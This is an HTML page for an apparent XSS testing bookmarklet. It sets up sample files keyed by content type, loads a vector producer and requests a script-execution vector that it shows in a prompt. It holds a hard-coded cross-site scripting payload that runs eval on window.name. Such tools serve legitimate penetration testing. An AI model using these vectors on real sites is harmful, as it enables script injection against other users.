<!DOCTYPE html>
<html>
<head>
<title>XSS Bookmarklet</title>
<script src="base64.js"></script>
<script src="caps.js"></script>
<script>
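// Page-local configuration used by the inline script below.
// The console message further down says this table mirrors a config in
// main.js (not in view here) and must be kept in sync by hand.
var CONFIG = {
  // Hostname the bookmarklet page was loaded from.
  host: document.location.hostname,
  // Base URL of the current document: location.href up to and including its
  // last "/", i.e. the href with the final path segment dropped. Computed
  // inline so no temporary leaks into the global scope (the previous form
  // assigned an undeclared variable `a` while building the same string).
  path: location.href.slice(0, location.href.lastIndexOf("/") + 1),
  debug: false,
  // Sample resources keyed by content type. NOTE(review): this file only
  // declares the table; how the keys are matched (exact vs. prefix) is up to
  // the Producer in caps.js -- confirm there before relying on it.
  res: {
    // Type: content-type, either type/subtype or just type, not "type/*".
    'text/html': 'samples/sample.html',
    'text/plain': 'samples/sample.txt',
    'text/javascript': 'samples/sample.js',
    'text/css': 'samples/sample.css',
    'application/font-woff': 'samples/brankovic.ttf',
    // images
    'image/svg+xml': 'samples/sample.svg',
    'image/gif': 'samples/sample.gif',
    'image/jpeg': 'samples/sample.jpg', // ??
    'image/jpg': 'samples/sample.jpg',
    'image/png': 'samples/sample.png',
    'video/mp4': 'samples/video.mp4',
    'video/ogg': 'samples/video.ogv',
    'audio/mpeg': 'samples/audio.mp3',
    'audio/ogg': 'samples/audio.ogg',
    // more to follow... :)
    /* suggestions:
    application/xml, jar (application/x-compressed,application/java-archivemime-type)
    */
  },
};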
// Instantiate the Producer; ProducerModule is expected from caps.js, loaded above.
// NOTE(review): this is an undeclared (implicit global) assignment. Whether it
// creates window.Producer or updates a binding that caps.js itself declares
// depends on that file, which is not visible here -- left as-is for that reason.
Producer = ProducerModule();
// overwrite template-js code to include, this one avoids quotes and spaces
// (replaces the cached body the Producer serves for 'samples/sample.js', the
// same path CONFIG.res maps 'text/javascript' to).
Producer.mediaCache['samples/sample.js'] = "name?eval(name):alert(/XSS/.source)"
// Logged on every load as a reminder that CONFIG above duplicates the table in
// main.js (not in view) and has to be kept in sync manually.
console.log("TODO: Change this config when the config in main.js changes") //TODO FIXME XXX
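// On load: obtain a vector from the Producer, show it in a prompt, then
// navigate back to the previous page.
//
// The original busy-waited in a `while` loop with no exit condition, retrying
// getNewVector until it stopped throwing / returned a value. That hangs the tab
// forever if the Producer never becomes ready, and -- since JavaScript is
// single-threaded -- a synchronous loop could never observe an asynchronous
// init() completing anyway. This version polls with setTimeout and gives up
// after a bounded number of attempts.
window.onload = function() {
  // Bound on polling so a Producer that never initialises cannot spin forever.
  var MAX_ATTEMPTS = 200;
  var POLL_INTERVAL_MS = 50;
  // Last exception seen from getNewVector, reported if we give up.
  var lastError;

  // One attempt to fetch a vector; re-schedules itself while the Producer is
  // not ready yet (per the original comment, its internal init() fills the
  // mediaCache, and getNewVector throws or yields nothing before that).
  function attempt(attemptsLeft) {
    var vector;
    try {
      vector = Producer.getNewVector("CAP_EXECUTE_SCRIPT");
    } catch (e) {
      // Treated as "not ready yet"; remembered so the failure is not silent.
      lastError = e;
    }
    if (vector == undefined) {
      if (attemptsLeft > 0) {
        setTimeout(function() { attempt(attemptsLeft - 1); }, POLL_INTERVAL_MS);
      } else {
        console.error("Producer.getNewVector gave no vector after " + MAX_ATTEMPTS +
                      " attempts; giving up", lastError);
      }
      return;
    }
    // Show the vector, then go back. The original called history.go(-1) for
    // both OK and Cancel (`prompt(...) ? -1 : -1`), so the prompt's return
    // value is deliberately ignored here as well.
    prompt("XSS Vector", vector);
    window.history.go(-1);
  }

  attempt(MAX_ATTEMPTS);
};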
</script>
</head>
<body></body>
</html>